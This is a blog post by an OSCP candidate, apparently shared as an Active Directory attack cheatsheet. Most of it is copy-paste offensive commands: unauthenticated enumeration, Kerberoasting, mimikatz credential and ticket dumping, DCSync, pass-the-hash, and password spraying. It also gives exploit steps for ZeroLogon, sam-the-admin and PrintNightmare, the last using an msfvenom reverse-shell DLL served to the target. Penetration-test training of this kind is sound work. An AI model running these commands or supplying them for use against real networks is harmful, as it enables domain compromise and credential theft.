26. Apr 2022
Active Directory
Table of Contents
Here are some tips and tricks that got me thru the AD part of my OSCP exam.
Please note that this cheatsheet is outdated. A rewrite is in progress.
Set DNS / hosts #
Add the DC and all found clients into your /etc/hosts file.
192.168.99.10 dc1.domain.com dc1 domain.com
192.168.99.20 client1.domain.com client1
You could add the DC to your /etc/resolv.conf. But that will make internet research slower since all your requests would first go and then timeout at the DC.
Get a Shell or Credentials #
DNS Recon
Use fierce↗ to check for other servers inside the AD.
fierce --domain DOMAIN --dns-servers DCIP --subdomain-file /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
User Recon
Use windapsearch↗ to make LDAP queries. Often does not require a password!
# Query users
windapsearch -m users --dc DCIP
# Query login names
windapsearch -m users --attrs UserPrincipalName --dc DCIP | awk -F"Name:" '{print $2}' | awk '!/^$/'
# Descriptions (often contain passwords)
windapsearch -m users --attrs Description --dc DCIP
# Query all attributes for password
windapsearch -m users --full --dc DCIP | grep -i password
Use Kerbrute↗ to enumerate users
kerbrute userenum --dc DC -d DOMAIN /usr/share/wordlists/seclists/Usernames/Names/names.txt
kerbrute userenum --dc DC -d DOMAIN /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
Use CrackMapExec↗ to enumerate users
cme IP -u '' -p '' --users
# Get password policy
cme IP -u '' -p '' --pass-poll
Use username-anarchy↗ to format found names on company websites
username-anarchy -i INFILE > OUTFILE
Use cewl↗ to crawl websites for words to pack into a wordlist
cewl -d DEPTH -m MINIMUMLENGT --with-numbers -w OUTFILE LINK
hashcat --force INFILE -r /usr/share/hashcat/rules/best64.rule --stdout > OUTFILE
RPC Recon
# Could require credentials
rpcclient -u '' IP
enumdomusers
enumdomgroups
# Check printer description for passwords
enumprinters
impacket-rpcdump IP
# Check for PrinterNightmare
impacket-rpcdump IP | egrep 'MS-RPRN|MS-PAR'
SMB Recon
Check for anonymous/open shares
smbmap -H IP
cme smb IP -u '' -p '' --shares
enum4linux IP
After Shell and or Credentials #
Get a Shell #
Some ways to get a shell by just having a pair of credentials:
# Common
impacket-psexec 'DOMAIN\user:PASSWORD' -target-ip IP -dc-ip DCIP
impacket-smbexec 'DOMAIN\user:PASSWORD' -target-ip IP -dc-ip DCIP
impacket-wmiexec 'DOMAIN\user:PASSWORD' -target-ip IP -dc-ip DCIP
# Winrm (tcp/5985) need to be enabled
evil-winrm -i IP -u 'DOMAIN\user' -p 'PASSWORD'
# RDP (tcp+udp/3389) needs to be enabled
rdesktop -r clipboard:PRIMARYCLIPBOARD -r disk:host=/home/ -u 'USER' -p 'PASSWORD' IP
# Quite rare
impacket-atexec 'DOMAIN\user:PASSWORD@IP' 'command'
impacket-dcomexec 'DOMAIN\user:PASSWORD@IP'
Check for ASREPRoast #
# AD attrib: DONT_REQ_PREAUTH
impacket-GetNPUsers 'DOMAIN\user:PASSWORD' -dc-ip DCIP
Check for Kerberoast #
impacket-GetUserSPNs 'DOMAIN\user:PASSWORD@DCIP'
Basic PowerShell script you can run from a shell inside the AD:
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
# Search by what
$Searcher.filter="serviceprincipalname=*"
$Result = $Searcher.Findall()
Write-Host "---------------------------"
Foreach($obj in $Result)
{
ForEach($prop in $obj.Properties) {
# uncommnent to print all attributes
#$prop
}
Write-Host "[SAM Account Name]"
$obj.Properties.samaccountname
Write-Host ""
Write-Host "[User Principal Name]"
$obj.Properties.userprincipalname
Write-Host ""
Write-Host "[Service Principal Name]"
$obj.Properties.serviceprincipalname
Write-Host "---------------------------"
}
To request the ticket with PowerShell:
add-type -assemblyname system.identitymodel
new-object system.identitymodel.tokens.kerberosrequestorsecuritytoken -Argumentlist 'SPN'
To request the ticket with mimikatz:
.\mimikatz.exe
kerberos::ask /target:SPN
kerberos::list /export
Verify that the ticket is in memory with klist. Then use mimikatz↗ to export the ticket. This does not require admin or SYSTEM privileges.
.\mimikatz.exe
# Verify the ticket exists
kerberos::list
# Export to current folder
kerberos::list /export
Transfer the ticket to Kali, and crack it with kerberoast↗.
# Setup
virtualenv --python=python3 venv
source venv/bin/activate
git clone https://github.com/nidem/kerberoast/
cd kerberoast
pip3 install pyasn1
# Crack
python tgsrepcrack.py /usr/share/wordlists/rockyou.txt ticket.kirbi
Cracking is also possible with Hashcat and kirbi2hashcat↗.
python kirbi2hashcat.py ticket.kirbi > ticket.hashcat
hashcat --force ticket.hashcat -m 13100 /usr/share/wordlists/rockyou.txt
Check for the Big Exploits #
Those exploits only require valid domain credentials.
PrinterNightmare #
CVE-2021-1675
Check with:
impacket-rpcdump IP | egrep 'MS-RPRN|MS-PAR'
# Terminal 1
cd /SHOME/PATH/SOMEFOLDER
git clone https://github.com/cube0x0/impacket
wget https://raw.githubusercontent.com/cube0x0/CVE-2021-1675/main/CVE-2021-1675.py -O ./impacket/CVE-2021-1675.py
virtualenv --python=python3 impacket
source impacket/bin/activate
cd impacket
pip3 install .
pip2 install .
# Terminal 2
cd /SHOME/PATH/SOMEFOLDER
source impacket/bin/activate
cd impacket
msfvenom -p windows/shell_reverse_tcp LHOST=LISTEINGIP LPORT=LISTENINGPORT -f dll -o evil.dll
smbserver.py drop $(pwd) -smb2support
# Set up listener
# Terminal 1
python3 CVE-2021-1675.py domain.com/user:password@dcip '\\LISTEINGIP\drop\evil.dll'
SAM the Admin #
CVE-2021-42278
CVE-2021-42287
git clone https://github.com/WazeHell/sam-the-admin
cd sam-the-admin
virtualenv venv
source venv/bin/activate
pip3 install -r requirements.txt
pip2 install -r requirements.txt
python sam_the_admin.py DOMAIN/USER:PASSWORD -dc-ip DCIP -domain-netbios domain.com
ZeroLogon #
CVE-2020-1472
git clone https://github.com/risksense/zerologon/
cd zerologon
# DC NAME NOT FQDN!
python3 set_empty_pw.py DCNAME DCIP
goldenPAC #
CVE-2014-6324
impacket-goldenPac 'domain.com/user:password@dc'
Tools #
Mimikatz #
# Hashdump
.\mimikatz.exe
# Elevate
privilege::debug
# Check for logged on passwords (requiers admin/system)
sekurlsa::logonpasswords
# Dump SAM
lsadump::lsa /patch
# Overpass the Hash
.\mimikatz.exe
sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:NTLM /run:cmd
klist
net use \\DC
klist
# Pass the Ticket
.\mimikatz.exe
# Elevate
privilege::debug
# Export the tickets
# Creates .kirbi files in current folder
sekurlsa::tickets /export
# Load Ticket on another client
kerberos::ptt ticket.kirbi
# Silver Ticket
.\mimikatz.exe
# Elevate
privilege::debug
kerberos::purge
kerberos::golden /user:USER /domain:DOMAIN /sid:DOMAINSID /target:HOSTNAMETARGET /service:SPNTYPE /rce4:SERVICEHASH /ptt
Rubeus #
# Harvest TGTs
.\Rubeus.exe harvest /interval:30
# Password Spray
.\Rubeus.exe brute /password:Password1 /noticket
# Kerberoast
.\Rubeus.exe kerberoast
# Crack on Kali with
hashcat --force ticket.hashcat -m 13100 /usr/share/wordlists/rockyou.txt
# ASREProast
.\Rubeus.exe asreproast
# Crack on Kali with
hashcat --force hash -m 18200 /usr/share/wordlists/rockyou.txt
CrackMapExec #
# Get users
cme smb IP -u USER -d DOMAIN -p PASSWORD --users
# Get shares
cme smb IP -u USER -d DOMAIN -p PASSWORD --shares
# Bruteforce
cme smb IP -u USERLIST -p PWLIST --continue-on-success
Bloodhound #
# Start on Kali
sudo neo4j console
bloodhound --no-sandbox
# Remotely
bloodhound-python -u USER -p PASSWORD -d DOMAIN -ns IP -c All
# Client
. .\Sharphound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
.\sharphound.exe --CollectionMethod All --Domain CONTROLLER.local --ZipFileName loot.zip
Other Techniques #
KrbRelayUp #
Will get you a local SYSTEM shell if LDAP Signing and LDAP Channel Binding are not enforced
# https://github.com/Dec0ne/KrbRelayUp
# Do not use cmd.exe or powershell.exe. Those will spawn on desktop not in shell
.\KrbRelayUp.exe relay -d domain.com -c -cn evilpc$ -cp rockyou@123
.\KrbRelayUp.exe spawn -d domain.com -cn evilpc$ -cp rockyou@123 -s evilservice1 -sc "evil1.exe"
# After the first two have been executed once
.\KrbRelayUp.exe krbscm -s evilservice2 -sc "evil1.exe"
Pass the Hash #
Works only on servers with NTML authentication.
pth-winexe -U USERHASH //IP cmd
evil-winrm -i IP -u USERNAME -H HASH
Dump local SAM and Crack Hashes #
On Windows
# Needs Admin
reg save hklm\sam sam.out
reg save hklm\system system.out
On Kali
samdump sam.out system.out -o hashes.txt
hashcat --force hashes.txt -m 1000 /usr/share/wordlists/rockyou.txt
john hashes.txt -format=nt -wordlist /usr/share/wordlists/rockyou.txt
Dump the NTDS #
secretsdump.py -ntds ntds.dit -security registry/SECURITY -system registry/SYSTEM local -pwd-last-set -user-status -history
DC Sync Attack #
Needs GetChangesAll
secretsdump.py DOMAIN/USER@DCIP
secretsdump.py DOMAIN/USER@DCIP -just-dc-user USERTOGETHASH
SPN Impersonate #
Needs TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION
# We need to have the same time as the DC
# Stop getting time from vhost
sudo service virtualbox-guest-utils stop
# Update time from DC
sudo service sudo ntpdate DCIP
getST.py -dc-ip DCIP -spn SPN -hashes HASHFROMDOMUSER -impersonate administrator DOM/USER
export KRB5CCNAME=Administrator.ccache
impacket-psexec -k DOMAIN/Administrator@DC -no-pass
# Revert NTP to VBox
sudo service virtualbox-guest-utils start
Show LAPS Passwords #
If an owned user is either LAPS admin or just LAPS reader:
ldapsearch -v -x -D USER@DOMAIN -w PASSWORD -b "DC=DOMAIN,DC=com" -h DCIP "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd